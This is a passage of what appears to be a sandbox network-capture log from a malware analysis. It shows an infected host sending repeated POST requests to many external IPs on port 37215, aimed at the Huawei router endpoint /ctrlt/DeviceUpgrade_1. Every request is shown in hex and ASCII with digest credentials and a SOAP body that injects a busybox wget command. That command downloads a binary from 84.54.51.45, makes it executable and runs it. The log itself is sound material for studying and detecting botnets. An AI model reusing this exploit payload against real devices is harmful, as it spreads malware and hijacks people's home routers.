78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1410192.168.2.1549962197.163.248.12037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732419968 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1411192.168.2.1539520197.144.153.14537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732445955 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1412192.168.2.1553078197.161.2.12037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732475042 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1413192.168.2.1537960197.146.54.15237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732475042 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1414192.168.2.1540856197.93.194.15937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732475042 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1415192.168.2.1557260197.241.148.22437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732475042 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1416192.168.2.1533408197.172.162.20237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732494116 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1417192.168.2.1536076197.175.169.2637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732515097 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1418192.168.2.1542702197.228.145.19037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732537985 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1419192.168.2.1556340197.96.168.19037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732573986 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1420192.168.2.1557488197.232.112.2337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732595921 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
